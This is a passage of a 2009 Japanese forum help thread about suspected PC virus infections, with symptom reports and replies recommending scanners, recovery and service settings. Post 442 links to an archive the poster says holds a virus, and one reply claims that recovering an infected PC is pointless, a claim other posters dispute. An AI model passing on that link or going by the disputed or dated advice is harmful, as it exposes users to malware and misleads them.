IPが残るので半永久的に請求が行われます。
更に詳しい詳細は下の詳細ボタンを押してください。

という文の書かれたページに飛んだのですが
本当に感染してしまったのでしょうか?
確認する術を知らないので皆さんのご助力を得たいのですが・・・。
351名無しさん@お腹いっぱい。sage2009/01/21(水) 03:21:10
>>350
ちょっとはググれ

http://www.google.co.jp/search?hl=ja&q=W32.Aliz.Worm
352名無しさん@お腹いっぱい。sage2009/01/21(水) 11:31:02
てかそんなアドレス直リンすんなよボケ!
そんなサイトどうせ詐欺サイトなんじゃねーの
353名無しさん@お腹いっぱい。2009/01/21(水) 13:21:17
(・◎・)免許の更新にいってくる
354名無しさん@お腹いっぱい。sage2009/01/21(水) 13:22:03
>>353
誤爆乙
355名無しさん@お腹いっぱい。sage2009/01/21(水) 15:23:17
>>350
それ、いたずらサイト。
感染しないの問題ない。放置でOK
356名無しさん@お腹いっぱい。sage2009/01/21(水) 16:23:49
今XPをクリーンインストールした直後なんですが、

STOP! SYSTEM MAY REQUIRE IMMEDIATE ATTENTION
Your operating system registry may have errors or be corupt.
以下略

といった内容でRestorefix.comへの誘導の書かれたウィンドウが表示されました。
メッセンジャースパムというものらしいですが
そこに書かれたアドレスにアクセスしなければ平気なんでしょうか?
ドライバ等のアップデートを済ませてこれからXPの更新するところで
アンチウィルスソフトもまだ入れてない状態なのであまりググるのも危険な感じがして不安なんですが・・・。
このままアップデート作業進めて大丈夫なんだろうか・・・。
357名無しさん@お腹いっぱい。sage2009/01/21(水) 16:42:18
>>356
メンセンジャースパムはXP標準のサービス機能を悪用して行なわれるスパム
デフォルトではMessengerサービスがONの状態になっているので
手動でOFFにすれば今後届くようなこともない。
ttp://www.atmarkit.co.jp/fsecurity/rensai/securitytips/010messenger.html

ついでに言っとくが
リモートアシスタンスやゲストユーザーアカウントも確認して置くように
ONになってると色々まずい
あとサービスのいじり方に慣れたのなら、不要なサービスはOFFにしておくと
安全性は高まる。
358名無しさん@お腹いっぱい。sage2009/01/22(木) 07:54:41
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「有り」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

スキャンしてウィルスを発見したわけではなく、 1/21の夜から今現在まで
ウィルスバスターがしきりに不正変更を拒否しましたとポップアップを表示するようになりました。

【種類】           APIEvent
【検出リソース/プロセスID】  ZwWriteVirtualMemory
【ファイル名】        (空白)
【該当ポリシー】       DLL(プログラムライブラリ)インジェクション
【実行した処理】       確認&拒否

ttp://oshiete1.goo.ne.jp/qa4649268.html
教えてgooにもまったく同様の症状を訴えている人がいて
回答にある参考URL(トレンドマイクロの対策ページ)を元に原因を探しているのですが、
感染したことを示すファイル類は検索で見つかっていません。

ほぼ同時期に発症しているため気味が悪いのですが、どのように対処をすべきなのでしょうか。
359名無しさん@お腹いっぱい。sage2009/01/22(木) 16:45:55
んーネトゲやってる?
360358sage2009/01/22(木) 22:05:17
>>359
自分の場合は幾つかネットゲームを経験しており、今はハンゲームのAradや
ダレットのMHFをしています。
361名無しさん@お腹いっぱい。sage2009/01/22(木) 23:27:11
>>360
とりあえず同時期にあるということは同時期に何かが更新されたんだと思う。
誤検出の可能性があるけど、確証は無い。
362名無しさん@お腹いっぱい。sage2009/01/22(木) 23:37:14
まあ、簡単に言えばnProtectの関係かなぁ、と漠然と思ってるのですが。
自分ネトゲしてないのでよく判らんのです……

試験的に除外してみてもいいかも
363名無しさん@お腹いっぱい。2009/01/22(木) 23:41:37
まあ、あげとく
364358sage2009/01/24(土) 10:07:23
結局今回の動作の原因は分からず、再起動をしたら症状は治まりました。
最終的にウイルスバスターのセキュリティーレポートを確認すると
二日間で425件の不正変更の監視、その内ほぼ全てが確認と拒否でしたが
ZwWriteVirtualMemoryに二回の許可。
ZwCreateThreadに一回の許可がありました。

セーフモードでAdAwareとウイルスバスターを走らせましたが
原因となるプログラムも検出されませんでした。
365名無しさん@お腹いっぱい。2009/01/24(土) 15:15:27
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
366名無しさん@お腹いっぱい。sage2009/01/24(土) 17:51:13
>>358
いずれにせよそれって活動を隠すための手続きだと思うんですよ
ネットゲームのSecurityプログラムなども一部でそういう動きするらしく、
少し前に騒ぎになったこともあったと思うんですけども……

ただ、気になるのはrootkit系ウイルスも良くそういう活動をしたと思うんだよなぁ
ま、このままだとちょっと手が出ないので、アダ被で解析を依頼されて見てはいかがでしょうか?
367名無しさん@お腹いっぱい。sage2009/01/24(土) 17:57:32
987 :名無しさん@お腹いっぱい。:2009/01/24(土) 15:14:00
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
368名無しさん@お腹いっぱい。sage2009/01/24(土) 22:16:13
【使用OS】Windows XP
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】ウイルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
TROJ_TDSS.AXLN
C:\DOCUME~1\●● ~1\LOCALS~1\Temp\TDSScf7d.tmp

制限付のアカウントでは動作できるのですが、
管理者でログインするとデスクトップが表示されたままになります。
クリックやキー操作を受け付けません。

対策法を教えて頂けないでしょうか。
宜しくお願いします。
369名無しさん@お腹いっぱい。sage2009/01/25(日) 00:19:16
>>368
セーフモードで同じ? タスクバーは表示されてる?

タスクバーが表示されてなかったら、Ctrl+Shift+Escでタスクマネージャを起動して
「ファイル」->「新しいタスクの実行」で「explorer.exe」を起動してみて。

管理者でログイン出来たら、AVG Anti-Rootkitでスキャンして。

AVG Anti-Rootkit
ttp://www.softpedia.com/get/Antivirus/AVG-Anti-Rootkit.shtml
370名無しさん@お腹いっぱい。sage2009/01/25(日) 02:13:37
>>365
P2P使ってるから
371368sage2009/01/25(日) 09:31:10
>>369
おかげさまで解決しました。
ありがとうございました。
372名無しさん@お腹いっぱい。sage2009/01/25(日) 16:14:21
オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
自分のパソコンからUSBにウィルスは移るんでしょうか?
373名無しさん@お腹いっぱい。sage2009/01/26(月) 04:21:04
>>372
書き込みが日本語になってないから聞きたいことが良くわからんが……
オートランの拡散経路だけ説明だけする。

オートラン系のウイルス本体は、まずパソコンに感染する。
原因はさまざま。一番多いのはサイトからの感染だと言われてる。

で、そのあウイルスは感染PCに繋がれたUSBメモリに分身をコピーしてUSBを感染させ
その感染したUSBを媒介に、他のPCにも自分のコピーを広けると言う寸法。

以前は一つのファイルをブロックできれば無力化できたんだけど、
感染方法を変えやがったらしいから注意な。
しかし妙に対応が早いし、このウイルスの動きは奇妙。
374名無しさん@お腹いっぱい。sage2009/01/26(月) 20:46:21
誰か、google-redirectに感染した場合の対処方法を教えてくれ。
検索しても英語サイトばかりでわかんね。
375 ◆N9P3SuvBPo sage2009/01/26(月) 20:55:26
>374
>google-redirect
WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
googleに繋がるというものですね。
それなら『AVG Anti-Rootkit』が効果がありますよ。
お試しあれ
376名無しさん@お腹いっぱい。sage2009/01/26(月) 21:15:37
>>372
確かに373の言うとおり、質問が判りにくいなw

>オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
感染しない。USBとは通常、接続の仕様なので、USBメモリとかUSB接続HDDと表現してほしいね。
ただ、過去に事例が沢山あるが、USBメモリ、HDD、フォトフレーム、MP3プレイヤ等、USB接続を
利用する機器が、工場出荷時から感染していた事例は多く有るので、最新のセキュリティーを使用
することは、もはや必須。

>自分のパソコンからUSBにウィルスは移るんでしょうか?
USBメモリやHDDなど、自分のPCがマルウエアに感染すれば簡単に移る。しかも友人や会社など、周
りに多大な被害をもたらす。(最近、NETから隔離されている警察関連で大問題になってる)

373氏に付け加えるなら、自身で実行してしまう事例。ファイル交換の物、友人からの物、自分で
DLしたもの、まれにメール添付の物、など、自らマルウエアを管理者権限で実行する場合が多い。

又、WinUpdateしていない。ブラウザ自身やフラッシュやブラウザのアドオン(最近ではQuickTimeとか)、
PDFリーダ、他のNET接続するソフト類のアップデートを怠れば、何もしなくても感染する。
最近のNET事情は、知識のある奴でも躊躇するほど悪化していると思うよ。
安全と思われているWebページだって、明日は判らない。
377名無しさん@お腹いっぱい。sage2009/01/27(火) 00:52:52
オートラン経由のウィルスって未だにNOD32でしか発見できないの?
AVGとかでは無理か?
378名無しさん@お腹いっぱい。sage2009/01/27(火) 01:31:30
対応速度に社別の誤差はあるが発見はできると思う。
まず大手なら検出は可能。

まあ、問題は検出よりブロック、そして駆除だな。
379名無しさん@お腹いっぱい。sage2009/01/27(火) 08:25:16
>>375
>WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
>googleに繋がるというものですね。
ちょっと違うのですが、IE6.0で適当なページ(例えば、googleの検索結果のページなど)の
リンクをクリックすると、ステータスバーにhtttp://google-redirect.com/...と出て、
そのリンクにつながりにくい状態になることがある現象です。

でも、英語のページを辞書見ながら読んで、Malwarebytes' Anti-Malwareで解決しました。
ありがとうございました。
380名無しさん@お腹いっぱい。sage2009/01/30(金) 14:51:30
>>377
NOD32を使っていた警視庁がやられたのに
寝言は寝てから言ってね業者さん
381名無しさん@お腹いっぱい。sage2009/01/30(金) 14:52:43
●警察庁に採用されたウイルス対策ソフトESET Smart Security(NOD32)
ttp://shop.s2mall.net/shareware/08.shtml

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓

●警視庁ネットワーク、ウイルス感染…完全復旧週明けまで掛かる見込み
ttp://headlines.yahoo.co.jp/hl?a=20090124-00000003-yom-soci
警視庁のオンラインシステムに接続している端末のパソコンが、「W32・Downadup・B」と
呼ばれる新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、
22日午後から断続的にオンライン業務を停止していることがわかった。

この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、
手作業で行わざるを得なくなった。完全復旧は週明けの26日になる見込み。

サイバー攻撃など外部からの侵入の恐れは低く、USBメモリーなどをパソコンで使った際に
感染した可能性があるとして、同庁で感染経路を調べている。
382名無しさん@お腹いっぱい。sage2009/01/30(金) 15:23:28
ESET終わったな
383名無しさん@お腹いっぱい。sage2009/01/30(金) 15:37:17
始まってもいないのに終わったも糞も無いだろw
384名無しさん@お腹いっぱい。sage2009/01/30(金) 17:57:30
ですよねー
385名無しさん@お腹いっぱい。sage2009/01/30(金) 18:20:52
新種に感染して名前が在るってのも変だとか
記者は思わないのかねぇ

Nortonでずばりの名前がある
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-123015-3826-99
386名無しさん@お腹いっぱい。sage2009/02/01(日) 09:44:09
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1217945792

先日、「えこでこツール」というフリーソフトをDLし、 解凍してフォルダを開いたところ
「トロイの木馬に感染しました」というメッセージが出ました。
どうやら中に入っていた「uninstal.exe」が原因のようです。
慌てて隔離し、隔離室を空にしたのですが、これは削除出来たのでしょうか?


これと同じ症状が出てる troj_generic.dis
確かベクターとかでダウンロードしたはずなのになんでウイルスが入ってるんだろう
ダウンロードしてからかなり時間がたってるのに何で今頃警告が来るんだろう?
ワケがわからん

最近やったことといえばhugflashってソフトを
間違ってアンインスツールしたことぐらいしか思い当たらん
387名無しさん@お腹いっぱい。2009/02/02(月) 18:04:51
そいつは有名なソフトだな。
対応されたとか情報が見当たらんけど
とりあえずテンプレ使ってくれ。
388名無しさん@お腹いっぱい。2009/02/05(木) 21:24:56
【使用OS】 WindowsXP SP3
【Microsoft Update(MU)の状態】 
【使用セキュリティソフトとバージョン】 AVG8、CA Anti-virus(試用版)、
KINGSOFT、Avast! 4.8Home、Dr.WEB

【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 Spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 Yes

【スキャンの結果何が検出されたか】多過ぎて忘れた…

「XP AntiSpyware 2009」とかいうスパイウェアをうっかり踏んでしまいました
これによりウイルスがどっと入ってきて、全ドライブのhtmlファイル、
一部の実行ファイルが改竄され、何度駆除してもまだ残ってるようです

何度か再起動するとエクスプローラが起動しなかったり、
プリントスプーラなどがエラーを起こします

再インスコも何度もしましたが、他のドライブに感染したファイルが残っているようで
いたちごっこを繰り返してます
やっぱりフリー系よりノートンやバスターの方がいいのでしょうか?

しかしもう疲れました、PC窓から投げたいですorz
389名無しさん@お腹いっぱい。sage2009/02/05(木) 21:38:45
>>388
D:とかE:のルートにautorun.infが隠しファイルで存在してない?
ルータに接続してるPCは1台だけ?
390名無しさん@お腹いっぱい。sage2009/02/05(木) 21:39:55
自力で問題を解決できるような人なら
フリーの物と製品版、どちらを使っても差はあまりないと思うが
君は大人しく製品版のものを使った方がいいと思う。
391名無しさん@お腹いっぱい。2009/02/05(木) 21:50:42
マジレスお願いします。

いつも使ってるパソコン、ネット接続すると勝手に再起動するんだけど、
どうすればいいですか?
392名無しさん@お腹いっぱい。sage2009/02/05(木) 22:00:52
>>389
ルーターにPCは2台繋がってます
もう1台(今書き込んでるPC)には同じ症状は出ていないようです

>>390
そうかも知れないっすね
ちら裏ですが今は火の車なので試用版で我慢します…
393名無しさん@お腹いっぱい。sage2009/02/05(木) 22:04:16
>>388
>>274
394名無しさん@お腹いっぱい。sage2009/02/05(木) 22:05:04
>>391
いきなり再起動するなら故障。
続きは http://pc11.2ch.net/pcqa/
395名無しさん@お腹いっぱい。sage2009/02/05(木) 22:40:55
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「無料ソフト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新してる」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」

会社のPCなので詳しいスペックはわからないっすorz
マルウェアが発見されましたって出て、HDドライブCが開けなくなったり。外付けHDが認識しなくなったり。
会社のPCが無料ソフトってどうなんだろうな・・・
396388sage2009/02/05(木) 22:42:24
>>389
>D:とかE:のルートにautorun.infが隠しファイルで存在してない?

これを調べるの忘れてました
そのファイルは見当たりませんでした
397388sage2009/02/05(木) 23:48:34
今のところ除去できないやつはW32/Virut.hというものらしいです

まさかバスターまでやられるなんて・・・orz
398 ◆N9P3SuvBPo sage2009/02/06(金) 00:16:09
>397
リカバリを強く推奨します。
399名無しさん@お腹いっぱい。sage2009/02/06(金) 01:28:29
>>397
ウイルスがバックドアを開いて、PC内をいいようにされることもある。
そのまま使うと碌なことは無いよ。

>>398に禿同。早急にリカバリ。
400名無しさん@お腹いっぱい。2009/02/06(金) 02:02:02
【使用OS】 XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2008
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 ウィルスバスターに任せてます
【ルータの有無】 有

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トラッキングクッキー程度しか検出されませんでした


今、普通に別のスレでレスしてたら、いきなりヘッドフォンに子供っぽい笑い声が途切れ気味で入ってきて、いきなり「あーあー」って喋りだしてきました。
感じ日本語じゃないっぽくて、一回ネット回線切ってまた繋げなおしたら叫び声っぽいのに変わってました。
ウィルスバスターには常に監視させており、FWも機能中です。
何かをDLしたわけでもありません。
どういった症状なんでしょうかコレ…。
401名無しさん@お腹いっぱい。sage2009/02/06(金) 03:10:24
バスター常駐させとけば安全だと思ってる人って・・・
402名無しさん@お腹いっぱい。2009/02/06(金) 07:19:20
少年と男性はオンラインゲーム仲間。男性が少年に「キャラクターを強くするプログラムをあげる」と偽って、
実際にはIDやパスワードなど、パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。少年はゲームの動きが悪くなったことからキーロガーに気づき、ソフトを解析。盗まれた履歴の
送付先になっていた男性のメールアドレスやID、パスワードを割り出したという。

asahi.com  http://www.asahi.com/national/update/0205/NGY200902050001.html

↑この少年が行った手口を、バカでもわかるように解説してください。m(._.)m
403名無しさん@お腹いっぱい。sage2009/02/06(金) 07:25:38
ソフトを解析。盗まれた履歴の送付先になっていた男性の
メールアドレスやID、パスワードを割り出した
404名無しさん@お腹いっぱい。2009/02/06(金) 07:51:57
それ「解説」やない。
405名無しさん@お腹いっぱい。sage2009/02/06(金) 08:15:02
パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。
406名無しさん@お腹いっぱい。2009/02/06(金) 08:20:16
それ「少年が行った手口」やない。
407名無しさん@お腹いっぱい。sage2009/02/06(金) 08:26:05
少年と男性は  ゲ
                    イ
408388sage2009/02/06(金) 12:19:17
>>398
>>399

どうもです
>>274のスレ行って、紹介されていた削除ツールで何とか駆除できたっぽいです
しばらくこれで様子を見てダメだったらHDD買ってリカバリします
409名無しさん@お腹いっぱい。sage2009/02/06(金) 17:36:55
>>402
その情報だと、ソフトというか
通信を解析したダケじゃないのかねぇ?
FWで出来るだろ。
410名無しさん@お腹いっぱい。sage2009/02/13(金) 17:39:03
★質問用テンプレ★
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」「ZoneAlarm」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「Spybot」「AD-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有 」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も見つからない」

質問です。
(スパイウェアスレで質問したのですが、普通に広告では?と言われてしまったのですが、
どうも不安なのでこちらでも質問いたしました。)

Firefoxを使っているのですが、
毎回起こるのではなく、ごくたまになのですが、

googleの検索結果に出てきたリンク先をクリックしたときに、
一瞬、67.210.15.11とか67.210.14.30などのIPアドレスに勝手にアクセスして
その後1001anything.comやらpc-health.infoやらのアドレスに勝手にアクセスしようと試みて
最後は自動でgoogleのトップページに戻ってしまうことがあります。

これは原因はなにかに感染しているということでしょうか?
なにに感染しているのでしょうか?検索してもさっぱりわかりません。。。

一応、spybotもadawareもトレンドマイクロのウイルス&スパイウェアチェックも全部かけました。
411名無しさん@お腹いっぱい。2009/02/13(金) 17:47:17
起動すると 正しくないイメージ〜 って出ちゃうんですけど どう直せば良いですか?
412名無しさん@お腹いっぱい。sage2009/02/13(金) 18:14:54
>>410
バスタとZoneAlarmは機能競合を起こす。

ネットから切断した上で、ZoneAlarmとバスタw一度アンインスコ
そのあと、バスタのみをインストール
再びネットで定義更新してみる。
413名無しさん@お腹いっぱい。sage2009/02/13(金) 23:19:49
ウイルスバスターの会社(トレンドマイクロ)の社長は女性でそこそこ綺麗

トレンドマイクロの社長
http://internet.watch.impress.co.jp/cda/parts/image_for_link/14506-8141-1-1.html

ソース
http://internet.watch.impress.co.jp/cda/news/2005/06/24/8141.html
414名無しさん@お腹いっぱい。sage2009/02/13(金) 23:23:33
キューティクルが光ってる!
415名無しさん@お腹いっぱい。sage2009/02/14(土) 00:09:42
>>413
名前や顔つきからしてもろにアッチ系だな…
お世辞にも美人とは言えないと思うがCEOだけあって印象だけは悪くない罠
416名無しさん@お腹いっぱい。sage2009/02/14(土) 00:56:28
どうでもいい……スレ違いだし
417名無しさん@お腹いっぱい。sage2009/02/14(土) 00:58:15
>>410
リカバリしろ
418名無しさん@お腹いっぱい。sage2009/02/14(土) 23:50:18
>>410
その解説をします。
GOOGLE検索であろうが、YAHOO検索であろうが、検索で表示されたサイトを
クリックするとリダイレクト(他のサイトへ強制移動)されますね?
パソコンがウィルスに感染しているのでは無く、そのサイトがフィッシングサイト、
又は、ウィルスコードを記述してあるサイトの可能性があるのです。
最近GOOGLEでは、そういったサイトに入れないように、ブロックして元の
検索画面に戻すという事を行っているようです。
悪意のあるフィッシングサイトでは、いかにも本物と同じようなHPもありますし、
偽物のセキュリティプログラムを購入させようと、勝手にHP内でスキャンをし、
ウィルスに感染してます!という警告を出すHPもちらほら見る事もあります。
僕が見る限り、このケースをだけ見ると感染していないように思えます。
あと、ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
無意味です。


ありえないかもしれませんが、ご心配であれば、別のウィルススキャン方法も
ありますので、ぜひお試しください。
419418sage2009/02/14(土) 23:52:22
貼り忘れてたTT

ttp://secure47.blog114.fc2.com/blog-entry-15.html
420名無しさん@お腹いっぱい。2009/02/15(日) 19:06:10
>>418
まあ、それはいいがバスタはセーフモードで使えないぞ?
421名無しさん@お腹いっぱい。sage2009/02/15(日) 19:07:17
>ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
なんだこれ?ソースプリーズ。
422名無しさん@お腹いっぱい。sage2009/02/15(日) 19:14:15
ウイルスに感染したらリカバリ・クリーンインストールが基本。

システムの復元 を リカバリ だと思ってるとか言うオチかな?
結構間違ってる人居るみたいだし
423名無しさん@お腹いっぱい。sage2009/02/15(日) 19:21:23
ていうか>>410は何かのアドウェアに罹ってるだろ
424名無しさん@お腹いっぱい。sage2009/02/15(日) 19:25:46
しかし「Spybot」「AD-Aware」使っててかかってるからな……
あとは、リカバリかAVG Antirootkitでも試すぐらいしか
425 ◆N9P3SuvBPo sage2009/02/15(日) 19:45:09
>419
ttp://secure47.blog114.fc2.com/blog-entry-1.html

>1.ウィンドウズのアップデートを必ず行う。
>オフィスの脆弱性も、WINDOWS UPDATEで一緒にダウンロードする事が可能です。

Officeの脆弱性はWindowsUpdateでは修正されません。
Officeの脆弱性はMicrosoftUpdateを通じて修正されます。
426名無しさん@お腹いっぱい。sage2009/02/15(日) 19:49:32
>>425
補足乙
427 ◆N9P3SuvBPo sage2009/02/15(日) 21:12:37
ちなみに、ITの資格を持ってる人なら、リカバリと修復インストールの違いも分かるはずですがねえ…。
428名無しさん@お腹いっぱい。sage2009/02/15(日) 21:25:17
ITの資格ならぬ、ITの死角ですな
429名無しさん@お腹いっぱい。sage2009/02/15(日) 21:29:52
>>427
資格いうやつほどあてにならんのがIT業界だすw
430 ◆N9P3SuvBPo sage2009/02/15(日) 22:05:11
俺IT関連の資格は持ってないが、ウイルスに感染することは皆無ですねえ。
けど、そんな俺も昔はウイルスに感染した経験を持ってますが。
431名無しさん@お腹いっぱい。sage2009/02/16(月) 00:25:07
サイトが危険かどうか判定するスレってないの?
432 ◆N9P3SuvBPo sage2009/02/16(月) 00:29:21
>431
それでしたらラウンジやPC初心者にありますよ。
「勇気」とか「鑑定」で検索してください。
433 ◆N9P3SuvBPo sage2009/02/16(月) 00:30:25
PC初心者じゃなくて初心者の質問だ
434名無しさん@お腹いっぱい。sage2009/02/16(月) 00:36:47
>>432
サンクス

どうも白黒つかないサイトがあるんだよね
435名無しさん@お腹いっぱい。sage2009/02/16(月) 08:52:34
自作自演w
436名無しさん@お腹いっぱい。sage2009/02/16(月) 10:51:08
Malwarebytes' Anti-Malwareを入れようと思うんだけど、
このソフトって危険?
437名無しさん@お腹いっぱい。sage2009/02/16(月) 18:11:16
>>410はDNSChanger系のトロイに感染してるんでしょ
症状見たらすぐわかるじゃん
怪しいのはFirefoxのexeが入っているフォルダの中かもね
componentsフォルダの中に怪しいdll入ってないか?iamfamous.dllとか
そうなら違う駆除ソフトいろいろ試してみるといいよ

つーか、このスレこんなにレベル低かったっけ?
438名無しさん@お腹いっぱい。sage2009/02/16(月) 18:19:37
>>437
駆除ソフト色々って
特定のソフトを示せないんだと思うが

まあ、知ってたら書いてあげて
439名無しさん@お腹いっぱい。sage2009/02/16(月) 18:41:54
>>438
ベタだけどnortonで引っかかる気がする

というわけで>>410まだスレ見てたらやってみてよ
オンラインスキャンでもいいから
440名無しさん@お腹いっぱい。2009/02/17(火) 13:08:11
backdoorトロイに感染したファイルがあります。

ざまあ
441名無しさん@お腹いっぱい。2009/02/17(火) 15:28:43
>backdoorトロイに感染したファイル

トロイに感染したファイル?
ほほう。
442名無しさん@お腹いっぱい。sage2009/02/20(金) 14:27:04
http://hk.geocities.com/sa_icecream/sa99for29.zip
この中にあるウィルスぬいてほしいお
443名無しさん@お腹いっぱい。sage2009/02/20(金) 15:26:39
消したが、それ以降の指示がないからファイルは消した。
444名無しさん@お腹いっぱい。sage2009/02/21(土) 01:29:24
知人から、USBメモリからPC本体に感染し、
いくつかのフォルダを削除して自らも消滅する
ウィルスが出たらしい、と聞きました。
しかし、いくつかの単語を放り込んで検索してみても
そんな症状は出てきません。
削除型の症状は、ほぼすべてがワームで、USBの
autorunで感染するタイプのものは、検索には
ひっかかってきませんでした。

何か聞いたことある方いませんか?
445名無しさん@お腹いっぱい。sage2009/02/22(日) 00:34:26
>>444
したとかみた方が早いかも。
ttp://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20090205021020.html
446名無しさん@お腹いっぱい。sage2009/02/22(日) 02:44:41
>>445
ありがとう。
見てみたけど、該当しそうなものはみつかりませんでした。

自身で体験してないから詳細わからないのがもどかしいです。
知人の言うとおりだとすれば、定義ファイル対応前に破壊活動して
消滅されたらこちらでは対処しようがないし、通報もできません。
削除されたファイルがどれかわからないという事態も想定されますし、
場合によってはどこかに送信後消されている可能性もあるかも
しれません。

ただ、USBにも本体にもウィルスが残っていないのであれば、
どうやって感染活動しているのかよくわかりませんし、
実は原因が別にあるんじゃないかとも疑っているんです。
それで、何か情報があればと思いまして。
447 ◆N9P3SuvBPo sage2009/02/22(日) 15:03:44
>446
例えばwebからの感染であれば…

あるwebサイトを訪問

最新の定義にされたソフトでも発見できない亜種に密かに感染(潜伏)

そのPCにUSBメモリを挿し込む

そのUSBメモリに感染

あと、USBメモリー→PC→USBメモリーというパターン(橋渡しタイプ)は確率低いか…

どの道そちらで再検証するしかないですね。
俺らは画面の向こうで偉そうな事しか言えませんが…。
448名無しさん@お腹いっぱい。sage2009/02/22(日) 18:00:50
ttp://up.b9dm.com/video.php/vid_8546.htm

B9ってサイトでアニメ見ようとしたらavastで反応して削除したのですが
もう1回検査するだけで大丈夫でしょうか?削除したので分かりませんが
やばい物ですか?
449名無しさん@お腹いっぱい。sage2009/02/22(日) 20:09:50
Cryp_Xin2

ってウィルスに汚染されたんだけど、グーグルで検索しても
全然情報なくて
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CRYP%5FXIN2&VSect=Sn
とりあえずここくらいなんだけど英語だし
どうしたらいいんだ。削除したけど「駆除不可能なウィルス」って
書いてるし・・ハァ
450名無しさん@お腹いっぱい。sage2009/02/22(日) 20:29:04
セーフモードからは?
451名無しさん@お腹いっぱい。sage2009/02/23(月) 07:35:11
>>449
削除したならいいだろ。
他のexeやdllを書き換える形で寄生するのが本来のウイルスで、
それを元に戻すのを「駆除」と表現する。
元々存在しなかったexeやdllを新たに生成するよくあるトロイでは
「駆除できないので削除」となる。表現の問題だよ。
452名無しさん@お腹いっぱい。2009/02/24(火) 13:20:16
flv動画から色々と変換してくれるツール探してたら
窓の杜にニコキャッチングとかいうのがあったからサイトにいってダウンロード&インストールし終わって
ファイルの中にあった何かわからないけど開いてみたら一瞬黒い画面の窓が開いて
英語っぽい白い文字がずらーと流れていって窓が勝手に閉じたんですが

そのあとにウィルス検索してみたら10個もかかりました(いつもは1〜2個。
名前までは覚えてませんがこの「ニコキャッチング」の中にはいっていたのでしょうか?

あと一瞬でてきた黒い画面は何だったのかわかる人居れば教えてください;
453名無しさん@お腹いっぱい。2009/02/24(火) 13:21:56
>>452ですが自分で読み直してもわかりにくいものになってしまいました;
もしわかりにくかったらすいません;;
454名無しさん@お腹いっぱい。sage2009/02/24(火) 13:35:58
>>452
ffmpegていう動画・音声を変換するコマンドラインアプリケーション。
コマンドラインオプションを付けずに実行するとヘルプが表示される。

ffmpegと検出されたウイルスは関係ない。
455名無しさん@お腹いっぱい。sage2009/02/24(火) 13:43:42
Virus Totalに上げてみたけど、MSとpandaしかマルウェアに認定してなかったし
砂箱内で実行してみたけど特に何もなかったが・・・
456名無しさん@お腹いっぱい。sage2009/02/24(火) 14:41:17
>>452
> そのあとにウィルス検索してみたら10個もかかりました(いつもは1〜2個。

なんでそんなに頻繁にウィルスに感染してるの?
457名無しさん@お腹いっぱい。2009/02/24(火) 17:47:06
ウイルスやトロイの木馬等は、いったん侵入すれば駆除しない限り存在し続けるのでしょうか。
例えば新品のPCを購入して、1ヶ月間アンチウイルスソフトを導入していなかったとします。
その後導入し、スキャンの結果ウイルスやトロイの木馬等といったものが検出されなかった場合、
そのPCは1ヶ月間まったく攻撃を受けていなかった、結果として危険性はなかったと考えてよろしいのでしょうか。
それとも、そんな単純なものではないのでしょうか。
こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
よろしくお願いいたします。
458名無しさん@お腹いっぱい。sage2009/02/24(火) 17:57:02
ソフトの性能によるが仮にあるアンチウイルスソフトがどんなウイルスでも
100%見つけ出す性能を持っていてそれで見つからなければ無傷といえる
ただ、100%見つけ出すものなんてないし、作ることもできないから
絶対危険性がなかったとは言い切れない

>こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
